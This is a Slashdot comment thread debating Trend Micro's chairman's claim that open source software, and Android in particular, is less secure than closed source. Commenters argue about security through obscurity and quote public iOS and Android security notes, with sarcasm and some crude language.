Slashdot Mirror
Trend Micro Chairman Says Open Source Is a Security Risk
dkd903 writes "Steve Chang, the Chairman of Trend Micro, has kicked up a controversy by claiming that open source software is inherently less secure than closed source. When talking about the security of smartphones, Chang claimed that the iPhone is more secure than Android because being an open-source platform lets attackers know more about the underlying architecture."
This comes a week after Trend Micro released a mobile security app for Android.
Just some FUD to sell an app.
In a related story, Trend Micro also noted that Windows has been far more secure than Linux for years due to it being closed source ...
Right. And the color yellow is more secure than the color blue.
There's a spot in User Info for World of Warcraft account names? Really?
people are less secure because attackers know that hitting them on the head with a rock will kill them. that's why there should be no biology taught in school, right?
new sig
Actually the opposite is true, if everyone knows how something works more people can call out the bullshit and fix the problem. With closed source problems can exist that linger forever because no one
the underlying code than trend micro.
First, no one who reads this is suddenly going to be convinced either way. Either you feel that making the code obscure makes it harder to find bugs, or you feel that making the code open makes it easier to fix them. Both are true, for various levels of vendor responsiveness in closed-source code and level of active involvement in open-source code.
If you have a vendor who actively solicits and rewards bug/vulnerability reports, puts a lot of time and money into fixing them, and keeps their source closed, you'll probably have about the best security possible. In the real world, it's not so black and white.
Having said all that, this is pure astroturfing. GAAAAAHHHHH!!! THE FUCKING SCARE MONSTER'S GONNA GET YA IF YOU DON'T BUY OUR SHIT!!!! BUY ANTIVIRUS NOW OR JESUS KILLS A PUPPY!!!!
"This post contains words, known to the State of California to cause thought. Wash brain thoroughly after reading."
They were doing this malarkey at my office a couple of years ago. They were spending all kinds of money on licenses on some sound program from Adobe (it was only going to be used to edit down calls that we recorded in our call center...so, yeah. We didn't really have huge requirements.) I tried convincing them to just use Audacity, but their response was "it's open source, anyone could mess with it, it was probably made by some guy in china, it's free which means it sucks, etc." ::eyeroll:: I tried telling them about how widespread its use is, and how it was made by a former Carnegie-Mellon-current-Google-employee, but they weren't having none of it.
Living With a Nerd
It doesn't matter if one person or everyone in the world knows the underlying architecture. If the underlying architecture is junk then the problem is the underlying architecture instead of if it is closed or open source.
and Trend. I spend all my time cleaning up machines that have those products installed and they still get hosed. Its really kind of nice knowing that as long as they exist I will be able to make a living.
That's nice. Of course, I tend to associate Internet security firms with SEO consultants, astrologers, and anyone else who makes a living off fear and ignorance.
Dewey, what part of this looks like authorities should be involved?
I guess I'm not gonna be renewing my network's TrendMicro licenses when they expire next month...
@Mr Chang...
Repeat after me.. security through secrecy only works while your secret is, err, secret..
Now; how many engineers have worked on the iOS platform again? will they all keep it's secrets? Can you guarantee that? Do you realise that by keeping it secret Apple are also restricting the number of white hats that can notify them of security problems before they get exploited?
In modern business it seems the more someone is paid, the more drivel they spout.
"Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
To be fair those are the big three and anyone writing spyware/viruses is going to have a copy of them and won't release their product until it gets past them
I say Steve Chuang is a money-grubbing bastard who steals money from his customers for a service they wouldn't need if everyone would migrate away from Windows and the closed-source hegemony. So there.
It completely fails to surprise me that an AV would have completely given up on the notion of security through technical correctness and have fallen back on the notion of security through obscurity.
The whole idea of OSS security(unlike, say, physical security) is that software bugs and errors are what introduce insecurities, that a technically correct system will be secure even if the attacker knows what it looks like(the same principle as in cryptography). This isn't true of physical systems; because physical materials always have finite strength; but software can(at least in theory, it rarely does) possess technical correctness.
I am, of course, totally unsurprised that an AV company would have completely given up on such a thing, and are falling back on obscurantism and endless layers of bandaids...
I guess things like SHA-1, RSA and AES are also bad and insecure because they are "open", So obscurity is not security now, not that I'd expect much from an AV vendor that ultimately benefits from insecure systems.
I have to constantly find open source malware and virus protection because the server/client TrendMicro package we have at my employer doesn't catch anything.
What Chang is basically saying is that "security through obscurity is inherently more safe than proper implementation" - something that was proven wrong a long time ago. Sure, when you got the implementation right, open source or closed source, extra obscurity won't hurt other than possibly maintenance, but prioritizing it is a misapplication of resources.
So why is this news? Stupid people say stupid things all the time.
The CEO of a computer security company parrots "security through obscurity." Well guess I won't trust any Trend Micro products.
I've used some of Trend Micro's apps in the past and I have to say, they wouldn't know a security risk if it crawled up their collective butt and died. I like their centralized management console, but, aside from that, I've had nothing but bad luck with them. Their products tend to be heavy with ActiveX controls (no security issues there, I'm sure) and they don't generally seem to do a good job anyway. Even keeping right on top of updates, threats are constantly getting through and I have to set up a second perimeter control (a network appliance based on Linux and Tomcat, amusingly enough) to screen out the junk TM's products can't seem to find.
Not to mention the fact that I absolutely hate their licensing terms. I shouldn't have to buy multiple products in a "security package" that all address the same general category of threats just because those threats use different attack vectors.
This silly comment doesn't really influence my decision one way or another, but I seriously doubt I'm going to go with TM's products again once it comes time to either renew support or implement another option.
"This comes a week after Trend Micro released a mobility security app for Android."
Oooooooohhh. Trend Micro wants us to worry about security and then sell us a security app.
Slashdot is News for Nerds: the OP's are supposed to be news whereas the editorializing is supposed to take place in the comments sections. There is a trend around here that the OP's render their opinions now.
I say to the OP's, cut out the snark and leave the snark to those of us in the Peanut Gallery. If you want to color the news with your opinions, get in line with the rest of us and subject your comments to the moderation system.
First, everyone knows how much harder reading reverse-engineered code is compared to skimming a nice commented code.
Second, like it or not, but in some situations, security-through-obscurity actually works (i.e. increases the security). For example, on servers which the attacker can access only via the web browser and the web application UI.
Security through obscurity FTW! Everyone knows that is the best way to secure a system!
"iPhone is more secure than Android because being an open-source platform lets attackers know more about the underlying architecture."
And that guy is the chairman of a computer security company?
no, I don't have a sig
Does this guy really expect to be taken seriously? He claims that iPhone is more secure than Android, and they still launched for iPhone???? I bet they're hoping that WIndoze Phone 7 gets some sales(however unlikely that seems right now), so they can scare the victims into buying their security app for that. I reckon that they are starting to see the end for windoze and the demise of their dismal, unnecessary businesses, so they're trying to scare up business elsewhere.
Good heavens! Oh my, a maker of anti-virus software for the most virus ridden system in the world claims OSS is insecure? Wow, the shenanigans couldn't be anymore obvious. Of course it's more insecure and it's in his best interest to say so. That's business folks! As always, follow the money. Trend Micro has been in bed with MSFT for a LONG time.
...especially if someone takes an OSS app that is compilable and adds few backdoors etc. and puts it up on mirrors. Yeah, check the checksums. I do, but how many non-tech geeks know even how to do that? Last company I worked for we provided service contracts for an OSS app and got it PA-DSS certified, fixed a bunch of problems, added features, and most importantly signed our binaries. Most OSS project don't and a lot of times are in a format where that is difficult.
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
every time someone thinks that closed source is better we have this debate. many eyes = better security
I guess he's never heard of a decompiler?
I guess, if nobody actually gets to look at your source, you're not opening yourself up to ridicule and scorn for the shoddy coding practices and multitude of exploitable errors...
No, the real ridicule comes when hostile crackers discover those exploitable errors through brute force or reverse engineering and, well, exploit them.
Sure, sometimes it can be a case of too many cooks and all that, but when it comes to hunting for security holes I'd think it just plain makes sense to have as many friendly eyes on the code as are willing to spend the time.
"I love animals! Some are cute, others are tasty, what's not to like?" - Betsy Schroeder, Jeopardy contestant
This is complicated.
First, open source vs closed source:
Security problems are just a very nasty subset of quality control issues. Quality code is a function of the quality of programmer, tooling, time schedule, etc.
Open source vs closed source is only one part of that equation, and though I believe it matters, it's not a determining factor BY ITSELF.
Second, Android VS iphone. There's 2 most likely attack vectors today: Browser bugs, and trojans downloaded on purpose that do something other then what they claim.
Android fairs worse then iOS on both of these. Both have lots of flaws in the browsers, but Apple is much better about actually allowing their users to patch their own phones(which just blows my mind, I admit, because they are still slow, but it happens.. Android patching rarely happens).
Both have malware available, but it's easier to distruibuite for Android.
Note that neither has a lick to do with opensource vs closed source, it's timely (though SLOW by desktop standards) software updates and quality control vs carrier locked, no-updates-ever and free for all downloading.
Blessed are the pessimists, for they have made backups.
I have been giving the whole security argument some thought lately, and I think security through obscurity has merit in the short term. It should be obvious that security holes can be found quicker when you have the source than when you don't. All products have security flaws. All products tend to have more security problems initially and they get corrected over time.
Where open source helps is almost like homoeopathy, to cure your disease, you basically force your body to have symptoms in order to get the immune system working overtime. Open source exacerbates the security threat, initially, finding (and fixing) more of the security holes, that every product has, more quickly. So, at inception, an open source program or package would seem to have way more security holes up front, but once the initial wave passes, it will have far fewer. Closed source, on the other hand, never gets that initial wave, and their security holes get discovered regularly over time, usually very quietly.
A couple cycles of open source, and you'll have something tested to be secure. Using Windows as an example, you'll never be able to have any way to quantify the risk in a closed source package or product.
If that was true then why do we have so many holes in Windows? That is closed source and everytime I turn around there is another security hole that has to get patched. I have dual boot machines at home and most of my time doing patches is for the windows side of things. On the other side of things my Linux boxes at home don't have as many problems with security and when a hole is found a patch is done much more quickly than I could even hope for in Windows.
It has all of the sound of a security vendor trying to scare people into going with a product that they know has problems and then sell them more of their offerings to 'protect'.
Security by obscurity is not security at all. Open source allows anyone to review the code and if there is a problem then a patch can be proposed and the hole is closed quickly. With closed source we don't know (unless you have a disassembler and can read assembler code) what is there and are dependant on the vendor doing timely patches.
One other observation. Security is not absolute, it is a process. This goes for both open source and closed source. What is secure today is not necessarily secure in the future. When holes are found they need to be analysed and fixed.
Panic now, beat the rush!
He's not really wrong necessarily, but every piece of software is a new security risk. Games, email programs, you name it its a security risk. Its obviously just a bunch of PR to sell an app. Open Source's greatest risk is also its best potential strength. Because hackers and anyone else can see the underlying code, the security holes that a hacker may exploit will be patched in record time, possibly even by the hacker himself. Meanwhile closed source can only rely on internal resources, not a bad thing necessarily but different. The truth is that Open Source is great, but then again so is closed. Six of one half dozen of another. I really see plenty of room for these two differing development styles to coexist.
There is an old argument that public key cryptography is weaker than a private key system. In public key systems, one key is out there and inherently contains everything an attacker needs to decode a message. We rely on the security of the crypto system to ensure they can't do that. Contrast this to the SAME system where both keys are kept secret - the attacker now has zero information about the keys. It's a bit of weak argument, since we do rely completely on the cryptosystem, but being obscure on top of being effective does help a little bit. That said, I would argue that the mere existence of alureon.h should convince folks that at least one platform (that is closed source) should be avoided.
I am using TrendMicro products every day, and I would say they are a greater security problem than anything else in the world.
The real risk is Trend Micro Chairman, to the security of your wallet.
Just don't give it to him.
You can't handle the truth.
Just take Windows vs Linux as an example. Everyone knows Windows is less of a security risk. It gets hacked less often, has the least amount of exploits and as a bonus even runs faster and more stable!
As he bend over, as he who did not realise its open source.
The sour grapes or better said "security by obscurity". That philosophy got Sony very far. Go-go TrendMicro !!!
+1 Garage
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
OS manufacturers are like sharks, they don't care what they eat as long as they get enough of it.
AV vendors are like those cleaner fish, who have no purpose in life than to eat the little bits of shit between the sharks teeth.
No-one really cares what they say, cos everyone knows they just want a little bit more shit to eat.
The Sharks tolerate them, but only because its hides the fact they don't clean their own teeth.
Using closed source software is like putting an admin in the woods at night with a thousand attackers and telling him to catch the attackers before they break into your treasure chest. By the time the admin catches one, the chest has already been looted and the admin spends the rest of his time patching up the loophole while the other attackers are already preparing their next break-in. A good admin shouldn't be measured by how well they handle damage control but how well they can analyze a new piece of software prior to business implementation. Obscurity is just another label for "I'm too lazy to look at source code, so I'm going to take out a giant insurance policy instead and hope that Snake Oil's interns weren't complete dunces when they wrote this software."
Security through obscurity is better for our sales. OSS contains far too few bugs to make our products necessary.
(Not that TM produced any good protection software, to be blunt for a change. Sorry, but given the choice between TM, McAfee and Panda I'd probably choose... a bullet).
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
And as long as MS produces OSs, I'll be able to make a living coding AV software.
Imagine a world of OSS only. Can you see how we'd be out on the street selling pencils and apples?
Closed source gives me a job! Hurray for CSS!
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
it'd be a shame if something happened to it.
Security through obscurity isn't inherently a bad thing. It's only considered bad when this is what companies rely on for all their security needs. If security through obscurity is coupled with other proven measures of security, it usually improves on the already good security. True, open design is something to be desired by some, but it's not a requisite for good security. There is and never was a guarantee that just because it's open source means it's secure--just like being closed source doesn't guarantee that the product is insecure.
Trend Micro makes its business off of being good at protecting devices from and detecting malware. I doubt that they have uninformed security professionals at the helm when they want to be the best out there.
In closing, I'm not trying to start a flame war, I'm just saying that shouting "SECURITY THROUGH OBSCURITY DOESN'T WORK" isn't entirely correct and doesn't automatically make you genius. Also, just because Chang is the chairman of a company doesn't mean he's retarded.
Came to post exactly that. Tren Micro has just proven that as a tech company they don't even understand basic security.
Well, I typically buy it for cheap, but I guess I won't be purchasing any more Trend Micro software.
Anyone that knows anything about computer security just lost all respect and sense of credibility for Trend Micro with this idiot-leader's claim.
Unfortunately, it is not often that security experts are responsible for making purchase decisions. The more those who make purchase decision hear about a company making claims in support of "the defacto norm" and deriding "the new thing" it reinforces the "decisions not to change" that are frequently made by people who simply don't know the truth.
There is more money to be made by resisting change and improvement, especially when that change is in favor of free and open source software. "Leader of well known security expert company says not changing is good" simply helps to reinforce the intertia of non-change. So now decision makers can feel more justified in their not making decisions and calling it "decision not to change" without actually doing anything or learning anything.
So, major corporations, focused mostly on profit, care more about device security than the owners of those devices? Interesting.
I'm just glad I can short-circuit Sprint's broken agps with a simple iptables rule on my Palm Pre. Voila! A GPS that works quickly and properly. No hacking required. Open platforms FTW.
Just watched a video of a Facebook engineer saying that Trend Micro has one of the largest HBase installations.
They should rip it out as it is inherently insecure.
Not news.
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
This is a serious question and not a troll... but how can you guarantee security if you don't control who can contribute to a project? For example, lets say that I write a huge contribution... (for example, I provided all of the drivers required for all of the major graphics cards.) In this code, I include a very obfuscated snippet of code that manages to give me control of any device. How can you detect this?
I understand that anyone can view the source, but what if nobody cares to look? What if those who do care to look are not good enough to spot the error? (see www.ioccc.org)
However, a closed-source program has a company that is financially liable if something fails. In addition, they have some kind of background check on the coders. If something does go wrong, you can hold someone else accountable. How can you hold an open-source community accountable?
I really don't understand, so an executive summary would be great. (I do hate the WOT)
The vast majority of millions of open source projects only have a few eyes one them.
Only projects like Linux kernel, apache, and a few others can claim "many eyes".
For the rest, security through obscurity would have been a better choice.
# curl -i http://us.trendmicro.com/
HTTP/1.1 301 Moved Permanently
Server: Apache
etc...
Hmm.
Counter-example. I reverse engineered part of a device to permit me to write my own software to interact with it. The results were useful to a community of a few thousand people. In return, some people sent me information they had for the device. I now have access to data sheets of its components, OS dumps, interface definitions, the results of various other bits of reverse engineering efforts, even full schematics of all the hardware.
Now remind me again, how does being closed source make a product more secure again?
Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
Nice Strawman there!
There are many ways to skin a cat and many safeguards that can be used to secure an OS.
Open source makes it easy to find which ones are in use and closed source makes it difficult.
The message is that good design plus obscurity beats just good design. That, at least, is the theory behind steganography.
I'm a Programmer. That's one level above Software Engineer and one level below Engineer.
A security company chairman advocating security through obscurity. I certainly buy any Trend Micro products now.
And what a fucking retard anyways. Christ PKI is a frickin' open standard, but it doesn't matter the least whether a potential attacker can read the specs, it isn't going to help him bust into my OpenVPN network any bloody better.
The world's burning. Moped Jesus spotted on I50. Details at 11.
Antisemitics: "[Jews] are [feeding on our babies' blood] and must be eradicated."
AntiFOSSes: "[Open Source developers] are [putting back doors into our computers] and must be eradicated."
Obi-Wan: "I felt a great disturbance in the Force, as if millions of voices suddenly cried out in terror and were sudden
Everybody knows that any code written by an attacker would have to be made freely available per the open source license. I don't see what the problem is.
Hence trend micro's most trusted software being open source?
Http://ossec.net
Everyone knows that if you leave your key under the doormat and you tell nobody, your house is *far* more secure than when you install a drawbridge, dig a moat around it, put alligators in the moat and then give out blueprints for the drawbridge, moat and alligators. And that, my fellow Slashdotters, is why nobody uses drawbridges anymore.
Visit http://ringbreak.dnd.utwente.nl/~mrjb/growingbettersoftware to download your free copy of the book
This guy could have been Pope in the middle ages. The church funded all of the technological research and did all of the publishing in the middle ages including Galileo and they did it “closed source” where they only shared the information in a very small group. When someone they funded came up with “stupid ideas” they quit publishing the data and came down hard on the researcher, again Galileo. Over a thousand years later after figuring out closed source research was really dumb Micrcrap and this idiot at Trend Micro want to take us back into the European middle ages.
What a maroon! And just how secure is Windows (proprietary OS) compared to Linux (open source)? IMHO, there is no comparison. I can't run Windows for more than a day without being inundated with virus attacks, and an occasional infection. I have been running Linux systems continuously and actively for 10 years and have yet to get a virus, rootkit, or other malware infection.
Sometimes, real fast is almost as good as real-time.
we should all stop using deadbolts, because everyone knows how they work!
What a bonehead. The iPhone which is based on BSD, is "open" similar to Android which is based on Linux. What this yahoo doesn't understand is the distribution model. The iPhone is "more secure" because it's tightly controlled by Apple and the carriers. The only way john q public can install software is via the App Store, where the software is vetted. Anyone can become a developer for the iPhone and gain unfettered access. Users can also 'jailbreak' iPhone and install anything. Due to this, the iPhone technically is no more secure than any other phone; iOS has just as many "vulnerabilities" as any other mobile OS... It's all about the software distribution model. The majority of users will never see or care about what's under the hood. They'll buy their wares from a safe warehouse, which makes targeting the platform with malware pointless, cause it can't gain any traction. Android could adopt the same distribution model and become just as "secure" as iPhone while still being "open". Essentially, there is no difference between iPhone and Android besides the distribution model. Being "open" doesn't make Android any less secure - it's the distribution model for average users to obtain software that makes the difference.
Obviously iOS is much more secure than Android:
Steve Chang, Chairman and Founder, a competent business leader according to the Trend Micro website (http://us.trendmicro.com/us/about/company/management/).
Quote:
"Under his leadership, Trend Micro grew to over 2000 employees with operations in more than 30 countries. From 1994 to 2003, revenues increased from US$10M to US$454."
No wonder he's so desperate to sell his vaporware.
“Apple has a sandbox concept that isolates the platform, which prevents certain viruses that want to replicate themselves or decompose and recompose to avoid virus scanners,”
APPLE - SECURITY
Products Affected
iPhone, Product Security
iPhone v2.1
*
Application Sandbox
CVE-ID: CVE-2008-3631
Available for: iPhone v2.0 through v2.0.2
Impact: An application may be able to read another application's files
Description: The Application Sandbox does not properly enforce access restrictions between third-party applications. This may allow a third-party application to read files in another third-party application's sandbox, and lead to the disclosure of sensitive information. This update addresses the issue by enforcing the proper access restrictions between application sandboxes. Credit to Nicolas Seriot of Sen:te and Bryce Cogswell for reporting this issue. This issue does not affect iPhone versions prior to v2.0.
ANDROID - SECURITY
Security Architecture
A central design point of the Android security architecture is that no application, by default, has permission to perform any operations that would adversely impact other applications, the operating system, or the user. This includes reading or writing the user's private data (such as contacts or e-mails), reading or writing another application's files, performing network access, keeping the device awake, etc.
Because the kernel sandboxes applications from each other, applications must explicitly share resources and data. They do this by declaring the permissions they need for additional capabilities not provided by the basic sandbox. Applications statically declare the permissions they require, and the Android system prompts the user for consent at the time the application is installed. Android has no mechanism for granting permissions dynamically (at run-time) because it complicates the user experience to the detriment of security.
The kernel is solely responsible for sandboxing applications from each other. In particular the Dalvik VM is not a security boundary, and any app can run native code (see the Android NDK). All types of applications — Java, native, and hybrid — are sandboxed in the same way and have the same degree of security from each other.
Guess that Apple Sandbox technology has its problems too. And did you know that sandbox is integrated into Android Kernel? Mr. Steve Chang didn't do his homework. or... did he?
Trend Micro Chairman Says Open Source Is a Security Risk
I think someone slipped and mixed up their words, because open source software is generally less of a security risk than is Trend Micro software.
This is a hacked account, for which the owner can not be held responsible.
Nobody should doubt that he is correct, because as we all know, open source software has a terrible reputation for security when compared to closed source software. Over and over, headlines trumpet breaches of OSS while CSS quietly performs with astonishing perfection.
Right? Right? That's what Trend Micro is saying, right?
After all, you don't see any tyrannosauruses 'round here, do ya?
MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
So I know what not to buy?
There are zero ways to jailbreak my shoe.
Sorry about that, Chief.
Oh, I'm sorry sir, I thought you were referring to me, Mr. Wensleydale.
Open Source is a risk to Trend because ClamAV is open source. They have tried to sue ClamAV out of existence before. Funny story: Trend gives the sysadmin no way to uninstall their products when migrating. I had to replace Trend with SEP. A kludgy script to stop services, delete files and registry keys, and get their shim out of the TCP/IP stack was the only way to do it. Their support sucks, as I can personally attest. On several occasions, I have fixed my problems with IMSS on Solaris while on a support call with their call center in Philippines. On one occasion, latency in pattern update installs caused a large newspaper for which I worked to contract a virus that put all the Windows servers in a reboot cycle. I had to get a list of IPs of infected servers from a Solaris box so the Windows admin could manually disinfect with NTFSDOS Pro.
Normally, both open and closed source have security advantages. Open source programs can be vetted by anybody, and changes can be (and usually are) applied quickly. Closed source programs are a bit harder to hack into, and it's more likely that somebody's actually paid for a good security analysis (although I'm not sure Apple does - as far as I can tell, they understand security less than Microsoft does).
In the case of mobile phones, the user may not have the ability to upgrade the software, and the people who can may simply not care. That nullifies the advantages of open source, and may leave closed source as more secure. At least if Apple has designed iOS intelligently with respect to security.
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
1) If Closed source is more secure then why is he writing security software to "secure" it?
2) If Open Source is so much less secure then there must be a viable market to tap. All those CEO's who want to make *billeens and billeens of dollars* for the greedy investors please speak now. <sound of crickets>
The reality check is that Open Source is doing just fine in keeping up with the problem of software vulnerabilities leading to the likes of massive bot-nets which have become the bane of our society. By Chang's own definition of "secure" he is targeting the wrong market, yet the market he is targeting is the one with all the problems in need of being fixed, but he has done nothing to change that. His own products have done nothing to "secure" even the most "secure" systems out there. He should be removed from being CEO as he has proven that he is both ineffective as a corporate officer, and he has proven that he doesn't even understand the market that he should be marketing to. In either case he is a poor excuse for a CEO of a publicly traded company.
Although Android is open source, actually installing new software on real-world devices is usually difficult and generally requires hacks. Unlike Linux or Firefox or whatever where a fix may be in a point release soon after its known about, if a flaw is found on an Android handset, it may only be fixed months down the track in a manufacturer update or it may never be fixed (unless someone has fixed it in a custom ROM and you are willing to go through all the sometimes-tricky steps to install those ROMs)
That Steve Chang is not considered a security expert ... The reason Android is less secure is due to implementation choices. If he believes that the iPhone OS has not been ripped apart to its very basic structures he is wrong. The jailbreak community developed sophisticated tools for just that and the Objective-C language itself lends to easy discovery. The quality of the code written with a mindful recognition of security issues is why it may be more secure than Android. Considering that the tools used to create each is mainly open source code, and that interface discovery is possible on both. And that I can profile the execution of code on either platform. (And Apple nicely provides me a simulator where 90% of this can be done without the issues of debugging on the device. Add that to the issue that Android is on a plethora of platforms, and iPhone is on one architecture with incremental improvements. Well iPhone has to be better designed than Android to put up the fight it puts up.
In addition Apple addresses the bugs in their platforms more promptly and is the single source of software updates. The Google Android environment involves too many players and too much finger pointing, and has issues such as delaying updates to push new phone models by the manufacturers responsible for pushing the updates to the phones. So Security fails for Android for commercial conflicts as well.
The assertion that open source is less secure than closed source is laughable considering that the majority of network connected machines rely on open source components for security; outside of Windows architecture machines (Which might arguably be the majority of connected machines but are calculably the largest source of security issues.)
FUD in the security field is unacceptable and when found out I think grounds for corporate punishment if done my executives to push their products on the uninformed.
- Tjp
I am in wallow with my inner money grubbing capitalistic pig. ... Oink!
Why do people allow chairmen to make ignorant remarks like that? Friends don't let friends make asinine remarks about security without at least understanding the issues: Kerckhoff's Principle.
Please someone tell the poor soul that they are using an opensource program.
$ curl --head http://us.trendmicro.com/us/home/
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Date: Sat, 15 Jan 2011 03:07:03 GMT
Connection: keep-alive
Remember when the jailbreakers fixed iOS's PDF exploit before Apple did? Good times.
Would it be true to say that a greater proportion of iPhone users are less security conscious? (The nice way of saying that a majority of iPhone users are dumb technophobes that wouldn't know how to exercise good security.)